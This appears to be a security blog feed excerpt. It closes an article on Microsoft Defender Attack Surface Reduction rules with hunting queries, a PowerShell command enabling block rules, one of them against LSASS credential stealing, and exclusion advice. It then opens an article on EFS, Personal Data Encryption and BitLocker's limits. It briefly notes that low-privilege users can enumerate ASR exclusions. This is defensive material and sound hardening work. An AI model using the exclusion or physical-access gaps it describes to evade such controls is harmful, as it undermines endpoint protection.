&lt;p&gt;&lt;code&gt;DeviceEvents | where ActionType startswith &quot;Asr&quot;&lt;/code&gt; returns every Audit and Block emission across the fleet. Pair with &lt;code&gt;DeviceProcessEvents&lt;/code&gt; and &lt;code&gt;DeviceFileEvents&lt;/code&gt; for the corroborating edge data; the Section 6 RunnableCode block demonstrates the shape. For the one rule without a &lt;code&gt;DeviceEvents&lt;/code&gt; row -- Block Webshell creation for Servers -- use Sysmon Event ID 11 in web roots plus IIS access logs [@ms-learn-asr-reference]. Microsoft Learn&apos;s operationalize page is the corresponding canonical reference for post-deployment monitoring practices [@ms-learn-asr-deployment-operationalize].&lt;/p&gt;
&lt;h3&gt;Step 4 -- Layer with the sibling controls&lt;/h3&gt;
&lt;p&gt;ASR alone is not a complete posture. The set of controls that compose with ASR includes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Tamper Protection&lt;/strong&gt; [@ms-learn-tamper-protection] -- prevents administrators (and attackers with admin rights) from disabling ASR rules at runtime through registry or service tampering.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud Protection (MAPS)&lt;/strong&gt; -- required for several rules including the prevalence-based executable rule and the ransomware advanced-protection rule [@ms-learn-asr-reference].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The Microsoft 365 Apps macros-from-the-internet-blocked-by-default policy&lt;/strong&gt; [@ms-learn-internet-macros-blocked] [@ms-techcommunity-internet-macros-2022] -- the consumer-facing twin of ASR&apos;s Office rules; default-on for every Microsoft 365 tenant since the July 2022 staged rollout.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The Vulnerable Driver Blocklist&lt;/strong&gt; [@ms-learn-driver-block-rules] -- default-on in Windows 11 22H2; sibling to the BYOVD ASR rule at the kernel-load edge.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;EDR-in-block-mode&lt;/strong&gt; [@ms-learn-edr-in-block-mode] -- only when Defender Antivirus is in passive mode (third-party AV is primary).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sysmon&lt;/strong&gt; -- for visibility into edges ASR does not block and for audit-trail corroboration of edges it does. (M1040 nominates ASR per-technique [@mitre-m1040]; M1042 does not mention Sysmon or ASR by name [@mitre-m1042] -- the pairing is practitioner consensus, not an M1042 nomination.)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Step 5 -- Track exclusions in source control&lt;/h3&gt;
&lt;p&gt;The exclusion list is the most common deployment-failure surface. Adding &lt;code&gt;C:\Program Files\Vendor\&lt;/code&gt; as an exclusion for one rule applies fleet-wide; over-broad exclusions are the dominant practical risk to the layer&apos;s integrity. Use Git or equivalent; review exclusions every quarter; demand a Jira ticket per exclusion with a sunset date.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; (1) Enable BYOVD, LSASS, and WMI persistence in Block mode (Standard protection -- start here). (2) Move the other sixteen rules through Audit, Warn, Block. (3) Hunt with &lt;code&gt;DeviceEvents | where ActionType startswith &quot;Asr&quot;&lt;/code&gt;. (4) Layer with Tamper Protection, Cloud Protection, the Microsoft 365 Apps macro default block, the Vulnerable Driver Blocklist, EDR-in-block-mode (for passive AV), and Sysmon. (5) Track exclusions in source control with sunset dates.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Exclusions added to one ASR rule apply fleet-wide. Over-broad exclusions are the dominant practical attack surface against an otherwise well-configured ASR posture. Adam Svoboda&apos;s published technique demonstrates that low-privilege users can enumerate the exclusion list directly from Defender&apos;s VDM containers [@adamsvoboda-asr-exclusions]. Track exclusions in source control. Review quarterly. Require a ticket with a sunset date for every entry.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If LSA Protection (RunAsPPL) is enabled on the device, the LSASS ASR rule shows as &quot;not applicable&quot; because LSA Protection already enforces the same boundary at a different layer [@ms-learn-asr-overview]. Confused defenders sometimes interpret the &quot;not applicable&quot; state as a rule misconfiguration; it is in fact the correct behaviour, and means the host is already protected against the equivalent class of attacks by LSA Protection plus Credential Guard.&lt;/p&gt;

```powershell
Set-MpPreference -AttackSurfaceReductionRules_Ids `
  &apos;56a863a9-875e-4185-98a7-b882c64b5ce5&apos;, `
  &apos;9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2&apos;, `
  &apos;e6db77e5-3df2-4cf1-b95a-636979351e5b&apos; `
  -AttackSurfaceReductionRules_Actions Enabled, Enabled, Enabled
Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Ids
```
Run as administrator. The three GUIDs are BYOVD, LSASS, and WMI persistence respectively. Confirm with the Get-MpPreference call. For staged rollout in an enterprise, manage these through Intune or Group Policy instead so the configuration follows the device.
&lt;p&gt;Five steps, three Standard protection rules, sixteen Other ASR rules, two rules that skip Warn mode, one universal hunting query. The rest is exception-list discipline. Section 11 closes with the seven misconceptions that survive every rollout.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

No. ASR rules live inside **Microsoft Defender Antivirus** -- the on-host scanning engine that ships free with every Windows edition that includes Defender. **Microsoft Defender for Endpoint** is the cloud-managed EDR layer Microsoft sells on top, with `DeviceEvents` Advanced Hunting, Indicators of Compromise management, and automated investigation. ASR rules can be configured locally via PowerShell or Group Policy with no Defender for Endpoint licence at all. Defender for Endpoint adds management, telemetry ingestion, and Advanced Hunting; it does not add the enforcement [@ms-learn-asr-reference] [@ms-learn-edr-in-block-mode].

No. This is the SOC-playbook folklore that survives every rollout. Each rule emits a rule-specific `AsrAudited` and `AsrBlocked` pair (the server-only Webshell rule is the only exception, with no `DeviceEvents` row at all). The canonical universal Advanced Hunting query is `DeviceEvents | where ActionType startswith &quot;Asr&quot;`, not equality against a generic value. Microsoft Learn&apos;s rules reference enumerates every pair [@ms-learn-asr-reference].

No. The Office macro era ended through three layers in combination: (1) **Europol&apos;s Operation LadyBird** on January 27, 2021, the coordinated international takedown of Emotet&apos;s command-and-control infrastructure [@europol-emotet-disrupted-wayback]; (2) **ASR&apos;s 2017-onward Office rules at the enterprise tier**, managed through Intune, Group Policy, or Defender for Endpoint; (3) **the Microsoft 365 Apps internet-macro default block at the consumer and tenant tier**, announced by Tom Gallagher on February 7, 2022 and resumed July 20, 2022 after a brief pause for usability fixes [@ms-techcommunity-internet-macros-2022]. ASR is the enterprise-managed layer. It was not the only layer. The honest version of the story names all three.

Partially yes, and the nuance matters. The interception point (`WdFilter.sys`, registered at altitude 328010 in the FSFilter Anti-Virus band per the IFS allocated-altitudes reference [@ms-learn-ifs-allocated-altitudes]) is **kernel-mode**. The policy evaluation (`MsMpEng.exe`) is **user-mode** at integrity level System. Calling ASR &quot;kernel-mode&quot; without nuance is incomplete; the correct one-line framing is &quot;kernel-mediated interception, user-mode policy evaluation.&quot;

No. Microsoft Learn&apos;s overview page states verbatim: &quot;If you enabled Local Security Authority (LSA) protection (recommended, along with Credential Guard), this rule is redundant&quot; [@ms-learn-asr-overview]. The LSASS ASR rule shows as &quot;not applicable&quot; on devices where LSA Protection is enabled. The &quot;not applicable&quot; state is the correct behaviour, not a misconfiguration.

No. Only two ASR rules skip Warn mode -- &quot;Block credential stealing from the Windows local security authority subsystem&quot; and &quot;Block Office applications from injecting code into other processes&quot; -- both per Microsoft Learn&apos;s overview page [@ms-learn-asr-overview]. Section 4 Generation 3 walks the byte-level proof that the rest of the catalogue (including the Safe Mode reboot rule and the copied-tools rule, two of the five rules the folklore wrongly lists) does support Warn.

Yes -- routinely. The &quot;the SOC never sees ASR&quot; framing is rhetoric, not reality. Multiple rules raise EDR alerts in Defender for Endpoint; every rule except the Webshell rule lands a row in `DeviceEvents` [@ms-learn-asr-reference]. The accurate framing is that ASR blocks rarely require analyst response because there is nothing left to triage once the kernel has returned the operation as failed -- the Frankfurt analyst from this article&apos;s opening never gets paged because the macro never spawned PowerShell. The SOC can hunt, audit, and report on ASR activity at any time; the choice not to triage individual blocks is exactly what a well-tuned preventive layer ought to enable.
&lt;p&gt;Nine years, seven generations, nineteen rules, one structural pivot from nodes to edges, and the same Cohen-1984 ceiling that every behaviour-block list inherits. The Frankfurt analyst from this article&apos;s opening never knew the macro fired -- because the kernel made sure nothing happened. That is the article in one sentence: a quiet layer that converts a credential-stealing-banking-trojan-turned-loader campaign into a single-row telemetry event the SOC routinely ignores, by classifying edges instead of nodes.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;attack-surface-reduction-rules-the-quiet-layer-that-stopped-office-macros&quot; keyTerms={[
  {term: &quot;Attack Surface Reduction (ASR) rules&quot;, definition: &quot;A fixed catalogue (19 rules in May 2026) of behavioural blocks enforced by Microsoft Defender Antivirus on supported Windows editions. Each rule names a specific runtime edge and can be set to Audit, Warn, or Block mode.&quot;},
  {term: &quot;Edge classification&quot;, definition: &quot;Deciding whether a specific runtime relationship between two nodes (process A creating process B, process A opening a handle to LSASS memory) is permitted, as opposed to deciding whether a node (binary) is malicious in isolation.&quot;},
  {term: &quot;WdFilter.sys&quot;, definition: &quot;The Microsoft Defender Antivirus kernel-mode minifilter, registered at altitude 328010 in the FSFilter Anti-Virus band, that intercepts the runtime edges ASR evaluates.&quot;},
  {term: &quot;MsMpEng.exe&quot;, definition: &quot;The user-mode Microsoft Defender Antivirus service that evaluates ASR rule predicates against edges intercepted by WdFilter.sys.&quot;},
  {term: &quot;BYOVD&quot;, definition: &quot;Bring Your Own Vulnerable Driver: an attack pattern where the operator imports a signed but vulnerable kernel driver to gain kernel-mode primitives and disable security telemetry.&quot;},
  {term: &quot;Mark of the Web (MOTW)&quot;, definition: &quot;The NTFS Zone.Identifier alternate data stream that marks a file as originating from outside the local machine. The Microsoft 365 Apps internet-macro default block uses MOTW as its trigger.&quot;},
  {term: &quot;Standard protection rules&quot;, definition: &quot;The three ASR rules Microsoft classifies as safe to enable in Block mode without staged rollout: BYOVD, LSASS, and WMI persistence.&quot;},
  {term: &quot;LOLBin&quot;, definition: &quot;Living-Off-the-Land Binary: a signed Microsoft Windows binary that attackers use to execute malicious behaviour while staying off identity-based allow-lists.&quot;},
  {term: &quot;Cohen-1984 undecidability&quot;, definition: &quot;Fred Cohen&apos;s 1984 result that detection of arbitrary viral behaviour in a program reduces to the Halting Problem and is therefore undecidable in general.&quot;}
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>attack-surface-reduction</category><category>microsoft-defender</category><category>endpoint-security</category><category>office-macros</category><category>edr</category><category>byovd</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Beyond BitLocker: The Three File-Level Encryption Layers Microsoft Hides in Plain Sight</title><link>https://paragmali.com/blog/beyond-bitlocker-the-three-file-level-encryption-layers-micr/</link><guid isPermaLink="true">https://paragmali.com/blog/beyond-bitlocker-the-three-file-level-encryption-layers-micr/</guid><description>BitLocker is one layer of four. EFS, Personal Data Encryption, and Purview sensitivity labels close gaps BitLocker structurally cannot -- three roots, three threat models, by design.</description><pubDate>Tue, 26 May 2026 00:00:00 GMT</pubDate><content:encoded>
**&quot;BitLocker is on&quot; is a misleading shorthand.** BitLocker encrypts the volume, but the volume is decrypted to the running OS the moment the TPM unseals -- which happens before any human authenticates. Three above-BitLocker layers close different gaps: the Encrypting File System (legacy per-user per-file, sealed by classic DPAPI), Personal Data Encryption (Hello-bound per-file, released through DPAPI-NG), and Microsoft Purview sensitivity labels (envelope encryption via Azure Rights Management, travels with the file across tenants). Three layers, three protection-key roots, three threat models -- by design, not by accident.
&lt;h2&gt;1. &quot;BitLocker Is On&quot;&lt;/h2&gt;
&lt;p&gt;A Windows 11 laptop sits on a desk at the user&apos;s lock screen. TPM-only &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker&lt;/a&gt;, secure boot clean, automatic login disabled. The owner stepped away to take a call.&lt;/p&gt;
&lt;p&gt;An attacker with physical access boots it normally. The &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM&lt;/a&gt; unseals the volume master key against PCR[7] and PCR[11].Microsoft Learn states the Secure Boot anchor verbatim: &lt;em&gt;&quot;By default, BitLocker provides integrity protection for Secure Boot by utilizing the TPM PCR[7] measurement&quot;&lt;/em&gt; [@ms-bitlocker-countermeasures]. PCR[11] is widely documented in TCG-aware BitLocker references as the boot-manager / BitLocker access-control measurement; the cited Wikipedia BitLocker article confirms TPM-PCR sealing in general terms [@wikipedia-bitlocker]. The point that matters is that TPM-only BitLocker seals against a subset of platform-state PCRs, and the unseal happens automatically when the boot chain has not been tampered with. NTFS mounts. The login prompt appears. The attacker now stands in front of a fully decrypted volume without having authenticated as any user.&lt;/p&gt;
&lt;p&gt;What is, and what is not, still protected at this exact instant?&lt;/p&gt;
&lt;p&gt;The expected reaction is &lt;em&gt;&quot;the data on disk is plaintext to whoever can read the running kernel; isn&apos;t that the whole point of why people add a PIN to BitLocker?&quot;&lt;/em&gt; That reaction is half right. The volume is plaintext, yes. But not every file on it is readable.&lt;/p&gt;
&lt;p&gt;Files marked with the EFS attribute are still encrypted. Files inside a Personal Data Encryption (PDE) protected folder are still encrypted. A DOCX labelled &quot;Confidential - All Employees&quot; by a Purview sensitivity label is still encrypted. Three different cryptographic mechanisms, three different protection-key roots, three different reasons the attacker is staring at ciphertext while the volume is mounted.&lt;/p&gt;
&lt;p&gt;This is the gap the rest of the article walks. It is the gap most security architects know exists in the abstract -- &quot;BitLocker is on&quot; does not mean &quot;every file is locked&quot; -- and which most do not know is closed by three structurally distinct technologies that have been hiding in plain sight since 2000.&lt;/p&gt;

Adding a pre-boot PIN closes part of this gap by requiring user input before the TPM releases the volume master key. That is genuinely useful. But TPM+PIN does not give per-user isolation on a shared device -- everyone with the PIN sees everyone else&apos;s files. It does not travel with the file when that file is emailed, copied to OneDrive, or saved on a USB stick. And it does not bind the on-disk key to any particular human identity. Pre-boot authentication and above-volume encryption solve different problems. The three layers in this article sit *on top* of TPM+PIN BitLocker, not in place of it.
&lt;p&gt;Three layers, three reasons, three different roots, three different attack surfaces. That is the article.&lt;/p&gt;

sequenceDiagram
    participant Hardware as TPM and PCRs
    participant Boot as Boot Manager
    participant OS as Windows Kernel
    participant User as Human at Keyboard
    Hardware-&amp;gt;&amp;gt;Boot: PCR[7], PCR[11] match
    Boot-&amp;gt;&amp;gt;OS: VMK released, NTFS mounts
    OS-&amp;gt;&amp;gt;OS: Volume now plaintext to kernel
    OS-&amp;gt;&amp;gt;User: Lock screen presented
    Note over OS,User: Attacker stands here, with a plaintext volume and no authenticated user
    User--&amp;gt;&amp;gt;OS: Hello PIN or biometric (eventually)
    OS-&amp;gt;&amp;gt;OS: Per-user secrets unseal
&lt;h2&gt;2. Historical Origins: Windows 2000 and the Birth of EFS&lt;/h2&gt;
&lt;p&gt;It is 1999. Laptops are appearing on every executive&apos;s desk. Theft is rising. The only protection NTFS offers against an attacker who walks off with a machine is the access control list, and the ACL is checked by the kernel of the operating system that mounted the disk. Boot a different operating system off floppy or CD, mount the NTFS volume as a foreign filesystem, and the ACL is just metadata to be ignored. The cryptographic protection of the data is exactly nothing.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s NTFS team responded by adding the first cryptographic primitive to the filesystem itself. Windows 2000 reached general availability on February 17, 2000 (after a December 15, 1999 release-to-manufacturing milestone) and shipped the Encrypting File System -- EFS [@wikipedia-windows2000]. The mechanism is documented in the 1999 Microsoft technical paper &lt;em&gt;Encrypting File System for Windows 2000&lt;/em&gt; [@efs-1999-paper].The original Microsoft Research URL for this paper now returns HTTP 404. A binary PDF mirror is preserved at cypherspace.org, but the PDF is image-streamed and the body text is not retrievable for direct quotation. The Microsoft author list could not be verified against the primary text, so this article cites the paper anonymously. The Microsoft Learn EFS Win32 reference, still on the docs site today, states the design plainly: &lt;em&gt;&quot;The Encrypted File System (EFS) provides an additional level of security for files and directories. It provides cryptographic protection of individual files on NTFS file system volumes using a public-key system&quot;&lt;/em&gt; [@ms-efs-win32].&lt;/p&gt;
&lt;p&gt;That sentence carries three design choices the rest of EFS hangs from. &lt;em&gt;File-level&lt;/em&gt;, not volume-level. &lt;em&gt;NTFS attribute&lt;/em&gt;, not separate database. &lt;em&gt;Public-key system&lt;/em&gt;, not symmetric password. Each of those choices was deliberate. Each fixes a problem the architects of NTFS in 1999 actively worried about.&lt;/p&gt;
&lt;p&gt;The file-level choice answered the &quot;what if BitLocker is on&quot; question seventeen years before BitLocker existed. NTFS already protected files at the access-control layer; what the team wanted was a way to make a particular file unreadable to a different user account on the same machine, not just to a foreign operating system. Volume encryption could not do that. The volume is one thing; users are many. So encryption belonged on the file.&lt;/p&gt;
&lt;p&gt;The NTFS-attribute choice answered the integration question. EFS encryption lives in a named stream attached to the file, &lt;code&gt;$EFS&lt;/code&gt;. The Windows API surface stays the same: &lt;code&gt;CreateFile&lt;/code&gt;, &lt;code&gt;ReadFile&lt;/code&gt;, &lt;code&gt;WriteFile&lt;/code&gt;, &lt;code&gt;CopyFile&lt;/code&gt; all work transparently against an encrypted file when called by an authorised user. Microsoft Learn is explicit about how the integration works: &lt;em&gt;&quot;When the source file is encrypted, CopyFile and CopyFileEx rely on the EFS service (hosted in lsass.exe) to create the target file and apply keys used in encryption of the source file&quot;&lt;/em&gt; [@ms-efs-win32]. Encryption was made invisible to existing applications. That was the only way a 1999 enterprise was going to deploy it.&lt;/p&gt;
&lt;p&gt;The public-key choice answered the recovery question. Public-key crypto lets the file have multiple wrappers around the same symmetric content key -- one for the user, one or more for designated recovery agents. An organisation that lost the user&apos;s private key (employee leaves, password forgotten, hard drive moved to a different machine) could still recover the file using a recovery agent the IT team controlled. The first Microsoft response to &lt;em&gt;&quot;what happens when a user forgets their password?&quot;&lt;/em&gt; was Group-Policy-enforced Data Recovery Agents (DRAs) [@wikipedia-efs]. In Windows 2000, the default DRA was the local Administrator account. From day one, EFS encryption was meant to be reversible by &lt;em&gt;someone&lt;/em&gt; other than the file owner.&lt;/p&gt;
&lt;p&gt;EFS is on the disk now. So what does the encrypted file actually look like? What does NTFS store, and where does the key live?&lt;/p&gt;
&lt;h2&gt;3. How EFS Works -- And Why It Was Always Per-User&lt;/h2&gt;
&lt;p&gt;The EFS key chain is the most important diagram in this article. Read it once carefully; every limitation of EFS that practitioners hit in production drops mechanically out of these arrows.&lt;/p&gt;

flowchart TD
    Plain[Plaintext file] --&amp;gt;|AES with FEK| Cipher[Ciphertext on NTFS]
    FEK[Per-file FEK, symmetric] --&amp;gt;|RSA-wrap| W1[Wrapper for user public key]
    FEK --&amp;gt;|RSA-wrap| W2[Wrapper for DRA public key]
    W1 --&amp;gt; EFSAttr[EFS named stream on the file]
    W2 --&amp;gt; EFSAttr
    UserPriv[User EFS RSA private key] --&amp;gt;|stored in| Profile[APPDATA Microsoft Crypto RSA SID directory]
    Profile --&amp;gt;|sealed by| ClassicDPAPI[classic DPAPI master key]
    ClassicDPAPI --&amp;gt;|derived from| Logon[User logon secret, NTLM hash plus salt]
&lt;p&gt;The chain has four layers. The bottom layer is the file contents themselves, encrypted with a freshly generated symmetric key called the File Encryption Key.&lt;/p&gt;

A per-file symmetric key, generated at the moment a file is first encrypted, used to encrypt the file body. Wikipedia summarises the design: *&quot;EFS works by encrypting a file with a bulk symmetric key, also known as the File Encryption Key, or FEK&quot;* [@wikipedia-efs]. The FEK never leaves the file system in plaintext; it is RSA-wrapped to every authorised principal before being stored in the file&apos;s `$EFS` attribute.
&lt;p&gt;The FEK is symmetric for performance: AES on the file body, not RSA. The Wikipedia EFS article notes that &lt;em&gt;&quot;the FEK (the symmetric key that is used to encrypt the file) is then encrypted with a public key that is associated with the user who encrypted the file, and this encrypted FEK is stored in the &lt;code&gt;$EFS&lt;/code&gt; alternative data stream of the encrypted file&quot;&lt;/em&gt; [@wikipedia-efs]. The same paragraph adds the second wrapper, the one without which enterprise EFS deployments would not work.&lt;/p&gt;

A second principal whose public key is RSA-wrapped around the FEK at encryption time, so that the recovery agent can decrypt the file even if the owning user is unavailable. Wikipedia notes that *&quot;In Windows 2000, the local administrator is the default Data Recovery Agent, capable of decrypting all files encrypted with EFS by any local user&quot;* [@wikipedia-efs]. Group Policy still ships DRA configuration in modern Windows.
&lt;p&gt;The cipher inside the FEK has not been static. EFS shipped with one default cipher in Windows 2000 and has moved several times since; the precise Windows 2000 default is disputed across secondary sources. Rather than commit to a version we cannot verify, this article notes that the FEK cipher has changed across releases. AES has been the default since Windows XP SP1 [@wikipedia-efs]; a later Windows 10 release moved the default key size from AES-128 to AES-256.Microsoft Group Policy / FIPS-compliance guidance documents the AES-128 to AES-256 default-key-size change at Windows 10 1709, but the cited Wikipedia EFS article&apos;s algorithm table lists only &quot;AES&quot; without a specific key size, so this article hedges on the exact version while keeping the AES-since-XP-SP1 anchor verbatim from Wikipedia.&lt;/p&gt;
&lt;p&gt;Now look at the top of the chain. The user&apos;s EFS RSA &lt;em&gt;private&lt;/em&gt; key sits in the user&apos;s roaming profile, in the path &lt;code&gt;%APPDATA%\Microsoft\Crypto\RSA\&amp;lt;SID&amp;gt;\&lt;/code&gt;.This same directory is where &lt;code&gt;cipher.exe /R&lt;/code&gt; writes self-signed DRA certificates and where &lt;code&gt;cipher.exe /K&lt;/code&gt; writes the user&apos;s own EFS keypair if one does not yet exist. Operational confusion lives here, because the same directory holds both per-user EFS keypairs and any recovery-agent certificates the user has imported. The private key is not stored in the clear. It is sealed by &lt;a href=&quot;https://paragmali.com/blog/dpapi-and-dpapi-ng-the-credential-vault-under-everything/&quot; rel=&quot;noopener&quot;&gt;classic Data Protection API (DPAPI)&lt;/a&gt;, Microsoft&apos;s per-user key-derivation system that wraps user-scoped secrets with a master key derived from the user&apos;s logon credential.&lt;/p&gt;

*Classic DPAPI* is the original Windows Data Protection API. Microsoft Learn describes the original pair: *&quot;Microsoft introduced the data protection application programming interface (DPAPI) in Windows. The API consists of two functions, CryptProtectData and CryptUnprotectData.&quot;* [@ms-dpapi-ng] It is per-user and per-machine: the master key is derived from the user&apos;s logon secret, so decrypting works only when the user is logged on locally. *DPAPI-NG* (Data Protection API &quot;Next Generation&quot;) was added in Windows 8 to extend the same idea to cloud scenarios where content encrypted on one machine must be decrypted on another, or where the unwrap should require a specific authentication factor. Microsoft Learn states the motivation: *&quot;Cloud computing, however, often requires that content encrypted on one computer be decrypted on another. Therefore, beginning with Windows 8, Microsoft extended the idea of using a relatively ... API to encompass cloud scenarios.&quot;* [@ms-dpapi-ng] EFS uses classic DPAPI. PDE, as we will see, uses DPAPI-NG.
&lt;p&gt;Wikipedia&apos;s EFS article states the consequence in one terse sentence: &lt;em&gt;&quot;In Windows 2000, XP or later, the user&apos;s RSA private key is encrypted using a hash of the user&apos;s NTLM password hash plus the user name ... any compromise of the user&apos;s password automatically leads to access to that data&quot;&lt;/em&gt; [@wikipedia-efs]. The cryptographic identity of the file&apos;s owner &lt;em&gt;is&lt;/em&gt; the user&apos;s logon credential, by construction.&lt;/p&gt;
&lt;p&gt;That is the design. Now mechanically derive the consequences.&lt;/p&gt;
&lt;h3&gt;Per-user, not per-process&lt;/h3&gt;
&lt;p&gt;The unwrapping principal of the EFS chain is the user SID. There is no place in the chain where an application identity could insert itself as a separate consumer. If you log on as Alice, every process running as Alice can ask the EFS service in &lt;code&gt;lsass.exe&lt;/code&gt; to unwrap any file Alice owns. The EFS service is a single user-mode endpoint; it does not gate on the calling process.&lt;/p&gt;
&lt;p&gt;Contrast this with &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt; and the LSAIso enclave, which deliberately move secret material into a Virtualization-Based Security enclave that even a kernel-mode caller in the host VTL cannot read. EFS is per-user; LSAIso is per-process-with-attestation. Different threat models, different mechanics.Credential Guard&apos;s LSAIso isolation is the kernel-mode equivalent of &quot;the application sees plaintext only if the application is the right application.&quot; EFS predates this design vocabulary by a decade and a half; its arrows simply do not include an application-identity step.&lt;/p&gt;
&lt;h3&gt;Password reset destroys access&lt;/h3&gt;
&lt;p&gt;If the only thing protecting the user&apos;s EFS RSA private key is classic DPAPI keyed off the user&apos;s password, then anything that breaks the user-password-to-master-key derivation also breaks the user&apos;s access to every EFS-encrypted file they own. Resetting a user&apos;s password from a domain administrator account does exactly this. Wikipedia warns in plain terms: &lt;em&gt;&quot;any compromise of the user&apos;s password automatically leads to access to that data&quot;&lt;/em&gt; [@wikipedia-efs] -- which is the same statement read the other way. Lose the password, lose the data. The DRA exists precisely so that the &lt;em&gt;organisation&lt;/em&gt; still has access; the user, however, is locked out.&lt;/p&gt;
&lt;h3&gt;Decryption on cross-volume or cross-protocol copy&lt;/h3&gt;
&lt;p&gt;EFS is bound to NTFS. When a file is copied to a different filesystem -- FAT32, exFAT, or pre-24H2 ReFS -- the destination cannot store the &lt;code&gt;$EFS&lt;/code&gt; stream, and the file is decrypted in transit. Wikipedia again: &lt;em&gt;&quot;Files and folders are decrypted before being copied to a volume formatted with another file system, like FAT32. Finally, when encrypted files are copied over the network using the SMB/CIFS protocol, the files are decrypted before they are sent over the network&quot;&lt;/em&gt; [@wikipedia-efs].&lt;/p&gt;
&lt;p&gt;This is not an EFS bug; it is what falls out when the encryption is implemented as a filesystem attribute and the destination filesystem has no equivalent. The cryptography ends where the attribute ends.&lt;/p&gt;
&lt;h3&gt;Opt-in, per file&lt;/h3&gt;
&lt;p&gt;EFS is enabled by setting the encrypt-attribute on a file or folder via right-click &lt;code&gt;Properties &amp;gt; Advanced &amp;gt; Encrypt contents to secure data&lt;/code&gt;, or via &lt;code&gt;cipher.exe /e&lt;/code&gt;. The user has to remember to do it. The volume default is unprotected. That is the entire mechanism: there is no &quot;encrypt every file Alice creates in her profile&quot; policy in classic EFS. PDE, twenty-two years later, finally addresses this.&lt;/p&gt;
&lt;h3&gt;Mutually exclusive with PDE&lt;/h3&gt;
&lt;p&gt;Microsoft Learn states the mutual exclusion plainly: &lt;em&gt;&quot;No, Personal Data Encryption and EFS are mutually exclusive&quot;&lt;/em&gt; [@ms-pde-faq]. A file cannot have both an EFS wrapper and a PDE wrapper at the same time. We will see why in §5; for now, register that the two layers compete at this layer of the stack, not compose.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every limitation of EFS drops mechanically out of one design decision: the protection root is the user&apos;s logon secret. EFS is per-user because the cryptographic identity is the user. To close the gaps EFS leaves, you cannot keep using the user&apos;s logon secret as the root. You need a different root.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;{`
// Illustrative only. Real EFS uses CNG primitives inside the EFS service in lsass.exe.
// Do not run this against real keys or files.&lt;/p&gt;
&lt;p&gt;function encryptFileWithEFS(plaintext, userPublicKey, draPublicKeys) {
  // 1. Generate a per-file symmetric File Encryption Key (FEK).
  const fek = randomBytes(32); // AES-256 since Windows 10 1709&lt;/p&gt;
&lt;p&gt;  // 2. Encrypt the file body with the FEK.
  const ciphertext = aesEncrypt(plaintext, fek);&lt;/p&gt;
&lt;p&gt;  // 3. RSA-wrap the FEK to every authorised principal.
  const wrappers = [];
  wrappers.push({ sid: &apos;user-sid&apos;, wrappedFek: rsaWrap(fek, userPublicKey) });
  for (const dra of draPublicKeys) {
    wrappers.push({ sid: dra.sid, wrappedFek: rsaWrap(fek, dra.publicKey) });
  }&lt;/p&gt;
&lt;p&gt;  // 4. Store wrappers in the file&apos;s $EFS attribute. Body is on disk.
  return { body: ciphertext, efsAttribute: wrappers };
}&lt;/p&gt;
&lt;p&gt;// Decryption is the reverse: locate the wrapper for the calling user&apos;s SID,
// unwrap the FEK with the user&apos;s EFS private key (loaded from
// %APPDATA%\Microsoft\Crypto\RSA\\ and unsealed by classic DPAPI from
// the user&apos;s logon secret), then AES-decrypt the body.
console.log(&apos;EFS encryption shape: one FEK, multiple RSA wrappers&apos;);
`}&lt;/p&gt;
&lt;p&gt;EFS is per-user because the cryptographic identity is the user. To close the gaps EFS leaves, you have to change the root. That is what the next twenty-six years of Windows file-data protection do, one root at a time.&lt;/p&gt;
&lt;h2&gt;4. Six Generations of Closing Each Other&apos;s Gaps&lt;/h2&gt;
&lt;p&gt;Each generation of Windows file-data protection is engineered to close a gap left by the previous one, and each new layer introduces a different protection-key root because each gap has a different threat model. Here is the twenty-six-year sequence.&lt;/p&gt;

timeline
    title Windows file-data protection generations
    2000 : EFS ships with Windows 2000
         : Per-user per-file, RSA wrap, classic DPAPI root
    2003 : RMS ships with Windows Server 2003
         : Per-content envelope, identity service authorization
    2006 : BitLocker ships with Windows Vista
         : Volume-level, TPM-sealed VMK
    2013-2014 : Azure RMS reaches general availability
         : Tenant key in Azure, cross-organisation default
    2018-2019 : Microsoft Information Protection unifies labels
         : Same RMS engine, single labelling plane
    2022 : Microsoft Purview brand consolidation
         : MIP becomes Microsoft Purview Information Protection
    2022 : Personal Data Encryption ships in 22H2
         : Hello-bound DEK via DPAPI-NG
    2022 : Windows Information Protection sunsets
         : &quot;Honest employees&quot; tool retired
    2024 : PDE for known folders ships in 24H2
         : Desktop, Documents, Pictures auto-encrypted
